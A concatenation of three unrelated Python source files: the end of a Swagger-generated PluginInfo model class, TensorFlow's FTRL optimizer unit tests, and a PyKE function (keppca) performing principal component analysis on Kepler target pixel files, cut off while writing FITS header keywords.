:return: The is_selected_for_start of this PluginInfo. # noqa: E501
:rtype: Bool
"""
return self._is_selected_for_start
@is_selected_for_start.setter
def is_selected_for_start(self, is_selected_for_start):
"""Sets the is_selected_for_start of this PluginInfo.
:param is_selected_for_start: The is_selected_for_start of this PluginInfo. # noqa: E501
:type: Bool
"""
self._is_selected_for_start = is_selected_for_start
@property
def services(self):
"""Gets the services of this PluginInfo. # noqa: E501
:return: The services of this PluginInfo. # noqa: E501
:rtype: List[PluginServiceInfo]
"""
return self._services
@services.setter
def services(self, services):
"""Sets the services of this PluginInfo.
:param services: The services of this PluginInfo. # noqa: E501
:type: List[PluginServiceInfo]
"""
self._services = services
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, PluginInfo):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for Ftrl operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow.python.platform
import numpy as np
import tensorflow as tf
class FtrlOptimizerTest(tf.test.TestCase):
def testFtrlwithoutRegularization(self):
with self.test_session() as sess:
var0 = tf.Variable([0.0, 0.0])
var1 = tf.Variable([0.0, 0.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([0.0, 0.0], v0_val)
self.assertAllClose([0.0, 0.0], v1_val)
# Run 3 steps FTRL
for _ in range(3):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-2.60260963, -4.29698515]),
v0_val)
self.assertAllClose(np.array([-0.28432083, -0.56694895]),
v1_val)
def testFtrlwithoutRegularization2(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 3 steps FTRL
for _ in range(3):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-2.55607247, -3.98729396]),
v0_val)
self.assertAllClose(np.array([-0.28232238, -0.56096673]),
v1_val)
def testFtrlWithL1(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.001,
l2_regularization_strength=0.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 10 steps FTRL
for _ in range(10):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-7.66718769, -10.91273689]),
v0_val)
self.assertAllClose(np.array([-0.93460727, -1.86147261]),
v1_val)
def testFtrlWithL1_L2(self):
with self.test_session() as sess:
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([4.0, 3.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
opt = tf.train.FtrlOptimizer(3.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.001,
l2_regularization_strength=2.0)
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose([1.0, 2.0], v0_val)
self.assertAllClose([4.0, 3.0], v1_val)
# Run 10 steps FTRL
for _ in range(10):
update.run()
v0_val, v1_val = sess.run([var0, var1])
self.assertAllClose(np.array([-0.24059935, -0.46829352]),
v0_val)
self.assertAllClose(np.array([-0.02406147, -0.04830509]),
v1_val)
def applyOptimizer(self, opt, steps=5, is_sparse=False):
if is_sparse:
var0 = tf.Variable([[0.0], [0.0]])
var1 = tf.Variable([[0.0], [0.0]])
grads0 = tf.IndexedSlices(tf.constant([0.1], shape=[1, 1]),
tf.constant([0]),
tf.constant([2, 1]))
grads1 = tf.IndexedSlices(tf.constant([0.02], shape=[1, 1]),
tf.constant([1]),
tf.constant([2, 1]))
else:
var0 = tf.Variable([0.0, 0.0])
var1 = tf.Variable([0.0, 0.0])
grads0 = tf.constant([0.1, 0.2])
grads1 = tf.constant([0.01, 0.02])
update = opt.apply_gradients(zip([grads0, grads1], [var0, var1]))
tf.initialize_all_variables().run()
sess = tf.get_default_session()
v0_val, v1_val = sess.run([var0, var1])
if is_sparse:
self.assertAllClose([[0.0], [0.0]], v0_val)
self.assertAllClose([[0.0], [0.0]], v1_val)
else:
self.assertAllClose([0.0, 0.0], v0_val)
self.assertAllClose([0.0, 0.0], v1_val)
# Run Ftrl for a few steps
for _ in range(steps):
update.run()
v0_val, v1_val = sess.run([var0, var1])
return v0_val, v1_val
# When variables are intialized with Zero, FTRL-Proximal has two properties:
# 1. Without L1&L2 but with fixed learning rate, FTRL-Proximal is identical
# with GradientDescent.
# 2. Without L1&L2 but with adaptive learning rate, FTRL-Proximal is identical
# with Adagrad.
# So, basing on these two properties, we test if our implementation of
# FTRL-Proximal performs same updates as Adagrad or GradientDescent.
def testEquivAdagradwithoutRegularization(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Adagrad learning rate
learning_rate_power=-0.5,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0))
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.AdagradOptimizer(3.0, initial_accumulator_value=0.1))
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivSparseAdagradwithoutRegularization(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Adagrad learning rate
learning_rate_power=-0.5,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0),
is_sparse=True)
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.AdagradOptimizer(3.0, initial_accumulator_value=0.1),
is_sparse=True)
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivSparseGradientDescentwithoutRegularizaion(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Fixed learning rate
learning_rate_power=-0.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0),
is_sparse=True)
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.GradientDescentOptimizer(3.0), is_sparse=True)
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
def testEquivGradientDescentwithoutRegularizaion(self):
with self.test_session():
val0, val1 = self.applyOptimizer(
tf.train.FtrlOptimizer(3.0,
# Fixed learning rate
learning_rate_power=-0.0,
initial_accumulator_value=0.1,
l1_regularization_strength=0.0,
l2_regularization_strength=0.0))
with self.test_session():
val2, val3 = self.applyOptimizer(
tf.train.GradientDescentOptimizer(3.0))
self.assertAllClose(val0, val2)
self.assertAllClose(val1, val3)
if __name__ == "__main__":
tf.test.main()
|
|
from .utils import PyKEArgumentHelpFormatter
from . import kepmsg, kepio, kepkey, kepplot
import re
import numpy as np
from astropy.io import fits as pyfits
from scipy import optimize as opt
from matplotlib import pyplot as plt
from tqdm import tqdm
import random
__all__ = ['keppca']
def keppca(infile, outfile=None, maskfile='ALL', components='1-3', plotpca=False,
nmaps=10, overwrite=False, verbose=False, logfile='keppca.log'):
"""
keppca -- Perform principal component analysis upon a target pixel file
keppca provides a method to mitigate for motion-derived systematic
artifacts via Principle Component Analysis (PCA). This method was
demonstrated on Kepler light curves by Harrison et al. (2012). It provides
an alternative to cotrending data using basis vectors (kepcotrend) and
correlating aperture photometry struture with time-series centroid
measurements (kepsff). PCA will perhaps become a more widespread tool in
the K2 era where the magnitde of target motion across the detector over a
Kepler quarter is experienced by a K2 target over just 6-hours during its
regular sequence of thruster firings that counteract boresight roll motion
Pixel-level PCA employs only those pixels collected around a specific
target and separates photometric trends common to all pixels from trends
localized to individual targets or pixels in a series of principal
component curves.
The user has the option to choose the specific set of pixels to sample in
this analysis. Principal components are plotted by the tool and written out
to an output FITS file in an output extension called PRINCIPAL_COMPONENTS.
The extension contains a 2D table with one row per timestamp recorded in
the input file and one column for every principal component. Summing all
principal components together will reconstruct a normalized version of the
summed pixel within the chosen aperture. The user also has the choice of
which principal components to optimally-subtract from the aperture-derived
light curve in order to remove motion systematics from the time-series
data. The aperture light curve and the corrected light curve are written to
the LIGHTCURVE extension of the output file. The first populates the
SAP_FLUX data column and the second is written to a column called PCA_FLUX.
This output file can be used as input for other PyKE tasks and can be e.g.
inspected using kepdraw.
Parameters
----------
infile : str
The name of a standard format FITS file containing Kepler or K2 target
pixels within the first data extension.
outfile : str
Filename for the output light curves and principal components. This
product will be written to the same FITS format as archived light
curves. Aperture photometry will be stored in the SAP_FLUX column of
the first FITS extension called LIGHTCURVE. A version of this light
curve with principal components subtracted is stored in column PCA_FLUX
and a normalized version is stored in PCA_FLUX_NRM. The individual
principal components are stored within a new FITS extension called
PRINCIPAL_COMPONENTS.
maskfile : str
This string can be one of three options:
* 'ALL' tells the task to calculate principal components from all
pixels within the pixel mask stored in the input file.
* 'APER' tells the task to calculate principal components from only the
pixels within the photometric aperture stored in the input file (e.g.
only those pixels summed by the Kepler pipeline to produce the light
curve archived at MAST (note that no such light curves are currently
being created for the K2 mission)
* A filename describing the desired photometric aperture. Such a file
can be constructed using the kepmask or kepffi tools, or can be created
manually using the format described in the documentation for those
tools. Note that if an aperture provided is not stricly rectangular,
keppca will increase the size of the aperture so that it defines the
smallest possible rectangle that contains all of the specified pixels.
components : str
A list of the principal components to subtract from the aperture light
curve. The strings '1 2 3 4 5', 1,'2,3,4,5' and '1,2,3-5' yield the
same result.
plotpca : bool
If True, keppca will produce plots containing individual principal
components, correlation maps and light curves, both aperture and
PCA-corrected versions. The will be stored as hardcopies in PNG format.
nmaps : int
The number of correlation maps and principal components to plot as
output. This can be any positive integer up to the number of pixels
within the mask, although note that many hundreds of plots will likely
become prohibitive and is unlikely to be informative.
overwrite : bool
Overwrite the output file?
verbose : bool
Print informative messages and warnings to the shell and logfile?
logfile : str
Name of the logfile containing error and warning message
Examples
--------
.. code-block:: bash
$ keppca ktwo202073445-c00_lpd-targ.fits.gz --plotpca
.. image:: ../_static/images/api/keppca.png
:align: center
"""
import mdp
if outfile is None:
outfile = infile.split('.')[0] + "-{}.fits".format(__all__[0])
# log the call
hashline = '--------------------------------------------------------------'
kepmsg.log(logfile, hashline, verbose)
call = ('KEPPCA -- '
+ ' infile={}'.format(infile)
+ ' maskfile={}'.format(maskfile)
+ ' outfile={}'.format(outfile)
+ ' components={}'.format(components)
+ ' plotpca={}'.format(plotpca)
+ ' nmaps={}'.format(nmaps)
+ ' overwrite={}'.format(overwrite)
+ ' verbose={}'.format(verbose)
+ ' logfile={}'.format(logfile))
kepmsg.log(logfile, call + '\n', verbose)
kepmsg.clock('KEPPCA started at', logfile, verbose)
# overwrite output file
if overwrite:
kepio.overwrite(outfile, logfile, verbose)
if kepio.fileexists(outfile):
errmsg = ('ERROR -- KEPPCA: {} exists. Use overwrite=True'
.format(outfile))
kepmsg.err(logfile, errmsg, verbose)
# Set output file names - text file with data and plot
dataout = np.copy(outfile)
repname = re.sub('.fits', '.png', outfile)
# open input file
instr = pyfits.open(infile, mode='readonly', memmap=True)
tstart, tstop, bjdref, cadence = kepio.timekeys(instr, infile, logfile,
verbose)
# open TPF FITS file
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, barytime = \
kepio.readTPF(infile, 'TIME', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, tcorr = \
kepio.readTPF(infile, 'TIMECORR', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, cadno = \
kepio.readTPF(infile, 'CADENCENO', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, fluxpixels = \
kepio.readTPF(infile, 'FLUX', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, errpixels = \
kepio.readTPF(infile, 'FLUX_ERR', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, flux_bkg = \
kepio.readTPF(infile, 'FLUX_BKG', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, flux_bkg_err = \
kepio.readTPF(infile, 'FLUX_BKG_ERR', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, qual = \
kepio.readTPF(infile, 'QUALITY', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, pcorr1 = \
kepio.readTPF(infile, 'POS_CORR1', logfile, verbose)
kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, pcorr2 = \
kepio.readTPF(infile, 'POS_CORR2', logfile ,verbose)
# Save original data dimensions, in case of using maskfile
xdimorig = xdim
ydimorig = ydim
# read mask definition file if it has been supplied
if 'aper' not in maskfile.lower() and maskfile.lower() != 'all':
maskx = np.array([], 'int')
masky = np.array([], 'int')
lines = kepio.openascii(maskfile, 'r', logfile, verbose)
for line in lines:
line = line.strip().split('|')
if len(line) == 6:
y0 = int(line[3])
x0 = int(line[4])
line = line[5].split(';')
for items in line:
try:
masky = np.append(masky, y0 + int(items.split(',')[0]))
maskx = np.append(maskx, x0 + int(items.split(',')[1]))
except:
continue
kepio.closeascii(lines, logfile, verbose)
if len(maskx) == 0 or len(masky) == 0:
errmsg = 'ERROR -- KEPPCA: {} contains no pixels.'.format(maskfile)
kepmsg.err(logfile, errmsg, verbose)
xdim = max(maskx) - min(maskx) + 1 # Find largest x dimension of mask
ydim = max(masky) - min(masky) + 1 # Find largest y dimension of mask
# pad mask to ensure it is rectangular
workx = np.array([], 'int')
worky = np.array([], 'int')
for ip in np.arange(min(maskx), max(maskx) + 1):
for jp in np.arange(min(masky), max(masky) + 1):
workx = np.append(workx, ip)
worky = np.append(worky, jp)
maskx = workx
masky = worky
# define new subimage bitmap...
if maskfile.lower() != 'all':
aperx = np.array([], 'int')
apery = np.array([], 'int')
# aperb is an array that contains the pixel numbers in the mask
aperb = maskx - x0 + xdimorig * (masky - y0)
npix = len(aperb)
# ...or use all pixels
if maskfile.lower() == 'all':
npix = xdimorig * ydimorig
aperb = np.array([], 'int')
aperb = np.r_[0: npix]
# legal mask defined?
if len(aperb) == 0:
message = ('ERROR -- KEPPCA: no legal pixels within the subimage are'
' defined.')
kepmsg.err(logfile, message, verbose)
# Identify principal components desired
pcaout = []
txt = components.strip().split(',')
for work1 in txt:
try:
pcaout.append(int(work1.strip()))
except:
work2 = work1.strip().split('-')
try:
for work3 in range(int(work2[0]), int(work2[1]) + 1):
pcaout.append(work3)
except:
errmsg = ('ERROR -- KEPPCA: cannot understand principal'
' component list requested')
kepmsg.err(logfile, message, verbose)
pcaout = set(np.sort(pcaout))
# The list of pca component numbers to be removed
pcarem = np.array(list(pcaout)) - 1
# Initialize arrays and variables, and apply pixel mask to the data
ntim = 0
time = np.array([], dtype='float64')
timecorr = np.array([], dtype='float32')
cadenceno = np.array([], dtype='int')
pixseries = np.array([], dtype='float32')
errseries = np.array([], dtype='float32')
bkgseries = np.array([], dtype='float32')
berseries = np.array([], dtype='float32')
quality = np.array([], dtype='float32')
pos_corr1 = np.array([], dtype='float32')
pos_corr2 = np.array([], dtype='float32')
nrows = np.size(fluxpixels, 0)
# Apply the pixel mask so we are left with only the desired pixels
pixseriesb = fluxpixels[:, aperb]
errseriesb = errpixels[:, aperb]
bkgseriesb = flux_bkg[:, aperb]
berseriesb = flux_bkg_err[:, aperb]
# Read in the data to various arrays
for i in range(nrows):
if (qual[i] < 10000 and np.isfinite(barytime[i])
and np.isfinite(fluxpixels[i, int(ydim * xdim / 2 + 0.5)])
and np.isfinite(fluxpixels[i, 1 + int(ydim * xdim / 2 + 0.5)])):
ntim += 1
time = np.append(time, barytime[i])
timecorr = np.append(timecorr, tcorr[i])
cadenceno = np.append(cadenceno, cadno[i])
pixseries = np.append(pixseries, pixseriesb[i])
errseries = np.append(errseries, errseriesb[i])
bkgseries = np.append(bkgseries, bkgseriesb[i])
berseries = np.append(berseries, berseriesb[i])
quality = np.append(quality, qual[i])
pos_corr1 = np.append(pos_corr1, pcorr1[i])
pos_corr2 = np.append(pos_corr2, pcorr2[i])
pixseries = np.reshape(pixseries,(ntim, npix))
errseries = np.reshape(errseries,(ntim, npix))
bkgseries = np.reshape(bkgseries,(ntim, npix))
berseries = np.reshape(berseries,(ntim, npix))
tmp = np.ma.median(np.ma.masked_invalid(pixseries), axis=1)
for i in range(len(tmp)):
pixseries[i] = pixseries[i] - tmp[i]
pixseries = np.ma.masked_invalid(pixseries)
# Figure out which pixels are undefined/nan and remove them.
# Keep track for adding back in later
nanpixels = np.array([], dtype='int')
i = 0
while i < npix:
if np.isnan(pixseries[0, i]):
nanpixels = np.append(nanpixels, i)
npix = npix - 1
i = i + 1
pixseries = np.delete(pixseries, nanpixels, 1)
errseries = np.delete(errseries, nanpixels, 1)
pixseries[np.isnan(pixseries)] = random.gauss(100, 10)
errseries[np.isnan(errseries)] = 10
# Compute statistical weights, means, standard deviations
weightseries = (pixseries / errseries) ** 2
pixMean = np.average(pixseries, axis=0, weights=weightseries)
pixStd = np.std(pixseries, axis=0)
# Normalize the input by subtracting the mean and divising by the standard
# deviation.
# This makes it a correlation-based PCA, which is what we want.
pixseriesnorm = (pixseries - pixMean) / pixStd
# Number of principal components to compute. Setting it equal to the number
# of pixels
nvecin = npix
# Run PCA using the MDP Whitening PCA, which produces normalized PCA
# components (zero mean and unit variance)
pcan = mdp.nodes.WhiteningNode(svd=True)
pcar = pcan.execute(pixseriesnorm)
eigvec = pcan.get_recmatrix()
model = pcar
# Re-insert nan columns as zeros
for i in range(len(nanpixels)):
nanpixels[i] = nanpixels[i] - i
eigvec = np.insert(eigvec, nanpixels, 0, 1)
pixMean = np.insert(pixMean, nanpixels, 0, 0)
# Make output eigenvectors (correlation images) into xpix by ypix images
eigvec = eigvec.reshape(nvecin, ydim, xdim)
# Calculate sum of all pixels to display as raw lightcurve and other quantities
pixseriessum = np.sum(pixseries, axis=1)
# Number of components to remove
nrem = len(pcarem)
# Number of pcas to plot - currently set to plot all components, but could set
# nplot = nrem to just plot as many components as is being removed
nplot = npix
# Subtract components by fitting them to the summed light curve
x0 = np.tile(-1.0, 1)
for k in tqdm(range(nrem)):
def f(x):
fluxcor = pixseriessum
for k in range(len(x)):
fluxcor = fluxcor - x[k]*model[:, pcarem[k]]
return mad(fluxcor)
if k == 0:
x0 = np.array([-1.0])
else:
x0 = np.append(x0, 1.0)
myfit = opt.fmin(f, x0, maxiter=50000, maxfun=50000, disp=False)
x0 = myfit
# Now that coefficients for all components have been found, subtract them
# to produce a calibrated time-series,
# and then divide by the robust mean to produce a normalized time series
# as well
c = myfit
fluxcor = pixseriessum
for k in range(0, nrem):
fluxcor = fluxcor - c[k] * model[:, pcarem[k]]
normfluxcor = fluxcor / np.nanmean(reject_outliers(fluxcor, 2))
# input file data
cards0 = instr[0].header.cards
cards1 = instr[1].header.cards
cards2 = instr[2].header.cards
table = instr[1].data[:]
maskmap = np.copy(instr[2].data)
# subimage physical WCS data
crpix1p = cards2['CRPIX1P'].value
crpix2p = cards2['CRPIX2P'].value
crval1p = cards2['CRVAL1P'].value
crval2p = cards2['CRVAL2P'].value
cdelt1p = cards2['CDELT1P'].value
cdelt2p = cards2['CDELT2P'].value
# dummy columns for output file
sap_flux_err = np.empty(len(time))
sap_flux_err[:] = np.nan
sap_bkg = np.empty(len(time))
sap_bkg[:] = np.nan
sap_bkg_err = np.empty(len(time))
sap_bkg_err[:] = np.nan
pdc_flux = np.empty(len(time))
pdc_flux[:] = np.nan
pdc_flux_err = np.empty(len(time))
pdc_flux_err[:] = np.nan
psf_centr1 = np.empty(len(time))
psf_centr1[:] = np.nan
psf_centr1_err = np.empty(len(time))
psf_centr1_err[:] = np.nan
psf_centr2 = np.empty(len(time))
psf_centr2[:] = np.nan
psf_centr2_err = np.empty(len(time))
psf_centr2_err[:] = np.nan
mom_centr1 = np.empty(len(time))
mom_centr1[:] = np.nan
mom_centr1_err = np.empty(len(time))
mom_centr1_err[:] = np.nan
mom_centr2 = np.empty(len(time))
mom_centr2[:] = np.nan
mom_centr2_err = np.empty(len(time))
mom_centr2_err[:] = np.nan
# mask bitmap
if 'aper' not in maskfile.lower() and maskfile.lower() != 'all':
for i in range(maskmap.shape[0]):
for j in range(maskmap.shape[1]):
aperx = append(aperx,crval1p + (j + 1 - crpix1p) * cdelt1p)
apery = append(apery,crval2p + (i + 1 - crpix2p) * cdelt2p)
if maskmap[i, j] == 0:
pass
else:
maskmap[i, j] = 1
for k in range(len(maskx)):
if aperx[-1] == maskx[k] and apery[-1] == masky[k]:
maskmap[i, j] = 3
# construct output primary extension
hdu0 = pyfits.PrimaryHDU()
for i in range(len(cards0)):
if cards0[i].keyword not in hdu0.header.keys():
hdu0.header[cards0[i].keyword] = (cards0[i].value,
cards0[i].comment)
else:
hdu0.header.cards[cards0[i].keyword].comment = cards0[i].comment
kepkey.history(call, hdu0, outfile, logfile, verbose)
outstr = pyfits.HDUList(hdu0)
# construct output light curve extension
col1 = pyfits.Column(name='TIME', format='D', unit='BJD - 2454833',
array=time)
col2 = pyfits.Column(name='TIMECORR', format='E', unit='d', array=timecorr)
col3 = pyfits.Column(name='CADENCENO', format='J', array=cadenceno)
col4 = pyfits.Column(name='SAP_FLUX', format='E', unit='e-/s',
array=pixseriessum)
col5 = pyfits.Column(name='SAP_FLUX_ERR', format='E', unit='e-/s',
array=sap_flux_err)
col6 = pyfits.Column(name='SAP_BKG', format='E', unit='e-/s',
array=sap_bkg)
col7 = pyfits.Column(name='SAP_BKG_ERR', format='E', unit='e-/s',
array=sap_bkg_err)
col8 = pyfits.Column(name='PDCSAP_FLUX', format='E', unit='e-/s',
array=pdc_flux)
col9 = pyfits.Column(name='PDCSAP_FLUX_ERR', format='E', unit='e-/s',
array=pdc_flux_err)
col10 = pyfits.Column(name='SAP_QUALITY', format='J', array=quality)
col11 = pyfits.Column(name='PSF_CENTR1', format='E', unit='pixel',
array=psf_centr1)
col12 = pyfits.Column(name='PSF_CENTR1_ERR', format='E', unit='pixel',
array=psf_centr1_err)
col13 = pyfits.Column(name='PSF_CENTR2', format='E', unit='pixel',
array=psf_centr2)
col14 = pyfits.Column(name='PSF_CENTR2_ERR', format='E', unit='pixel',
array=psf_centr2_err)
col15 = pyfits.Column(name='MOM_CENTR1', format='E', unit='pixel',
array=mom_centr1)
col16 = pyfits.Column(name='MOM_CENTR1_ERR', format='E', unit='pixel',
array=mom_centr1_err)
col17 = pyfits.Column(name='MOM_CENTR2', format='E', unit='pixel',
array=mom_centr2)
col18 = pyfits.Column(name='MOM_CENTR2_ERR', format='E', unit='pixel',
array=mom_centr2_err)
col19 = pyfits.Column(name='POS_CORR1', format='E', unit='pixel',
array=pos_corr1)
col20 = pyfits.Column(name='POS_CORR2', format='E', unit='pixel',
array=pos_corr2)
col21 = pyfits.Column(name='PCA_FLUX', format='E', unit='e-/s',
array=fluxcor)
col22 = pyfits.Column(name='PCA_FLUX_NRM', format='E', array=normfluxcor)
cols = pyfits.ColDefs([col1, col2, col3, col4, col5, col6, col7, col8,
col9, col10, col11, col12, col13, col14, col15,
col16, col17, col18, col19, col20, col21, col22])
hdu1 = pyfits.BinTableHDU.from_columns(cols)
hdu1.header['TTYPE1'] = ('TIME', 'column title: data time stamps')
hdu1.header['TFORM1'] = ('D', 'data type: float64')
hdu1.header['TUNIT1'] = ('BJD - 2454833',
'column units: barycenter corrected JD')
hdu1.header['TDISP1'] = ('D12.7', 'column display format')
hdu1.header['TTYPE2'] = ('TIMECORR',
'column title: barycentric-timeslice correction')
hdu1.header['TFORM2'] = ('E', 'data type: float32')
hdu1.header['TUNIT2'] = ('d', 'column units: days')
hdu1.header['TTYPE3'] = ('CADENCENO',
'column title: unique cadence number')
hdu1.header['TFORM3'] = ('J', 'column format: signed integer32')
hdu1.header['TTYPE4'] = ('SAP_FLUX',
'column title: aperture photometry flux')
hdu1.header['TFORM4'] = ('E', 'column format: float32')
hdu1.header['TUNIT4'] = ('e-/s', 'column units: electrons per second')
hdu1.header['TTYPE5'] = ('SAP_FLUX_ERR',
'column title: aperture phot. flux error')
hdu1.header['TFORM5'] = ('E', 'column format: float32')
hdu1.header['TUNIT5'] = ('e-/s',
'column units: electrons per second (1-sigma)')
hdu1.header['TTYPE6'] = ('SAP_BKG',
'column title: aperture phot. background flux')
hdu1.header['TFORM6'] = ('E', 'column format: float32')
hdu1.header['TUNIT6'] = ('e-/s', 'column units: electrons per second')
hdu1.header['TTYPE7'] = ('SAP_BKG_ERR',
'column title: ap. phot. background flux error')
hdu1.header['TFORM7'] = ('E', 'column format: float32')
hdu1.header['TUNIT7'] = ('e-/s',
'column units: electrons per second (1-sigma)')
hdu1.header['TTYPE8'] = ('PDCSAP_FLUX',
'column title: PDC photometry flux')
hdu1.header['TFORM8'] = ('E', 'column format: float32')
hdu1.header['TUNIT8'] = ('e-/s', 'column units: electrons per second')
hdu1.header['TTYPE9'] = ('PDCSAP_FLUX_ERR', 'column title: PDC flux error')
hdu1.header['TFORM9'] = ('E', 'column format: float32')
hdu1.header['TUNIT9'] = ('e-/s',
'column units: electrons per second (1-sigma)')
hdu1.header['TTYPE10'] = ('SAP_QUALITY',
'column title: aperture photometry quality flag')
hdu1.header['TFORM10'] = ('J', 'column format: signed integer32')
hdu1.header['TTYPE11'] = ('PSF_CENTR1',
'column title: PSF fitted column centroid')
hdu1.header['TFORM11'] = ('E', 'column format: float32')
hdu1.header['TUNIT11'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE12'] = ('PSF_CENTR1_ERR',
'column title: PSF fitted column error')
hdu1.header['TFORM12'] = ('E', 'column format: float32')
hdu1.header['TUNIT12'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE13'] = ('PSF_CENTR2',
'column title: PSF fitted row centroid')
hdu1.header['TFORM13'] = ('E', 'column format: float32')
hdu1.header['TUNIT13'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE14'] = ('PSF_CENTR2_ERR',
'column title: PSF fitted row error')
hdu1.header['TFORM14'] = ('E', 'column format: float32')
hdu1.header['TUNIT14'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE15'] = ('MOM_CENTR1',
'column title: moment-derived column centroid')
hdu1.header['TFORM15'] = ('E', 'column format: float32')
hdu1.header['TUNIT15'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE16'] = ('MOM_CENTR1_ERR',
'column title: moment-derived column error')
hdu1.header['TFORM16'] = ('E', 'column format: float32')
hdu1.header['TUNIT16'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE17'] = ('MOM_CENTR2',
'column title: moment-derived row centroid')
hdu1.header['TFORM17'] = ('E', 'column format: float32')
hdu1.header['TUNIT17'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE18'] = ('MOM_CENTR2_ERR',
'column title: moment-derived row error')
hdu1.header['TFORM18'] = ('E', 'column format: float32')
hdu1.header['TUNIT18'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE19'] = ('POS_CORR1',
'column title: col correction for vel. abbern')
hdu1.header['TFORM19'] = ('E', 'column format: float32')
hdu1.header['TUNIT19'] = ('pixel', 'column units: pixel')
hdu1.header['TTYPE20'] = ('POS_CORR2',
'column title: row correction for vel. abbern')
hdu1.header['TFORM20'] = ('E', 'column format: float32')
hdu1.header['TUNIT20'] = ('pixel', 'column units: pixel')
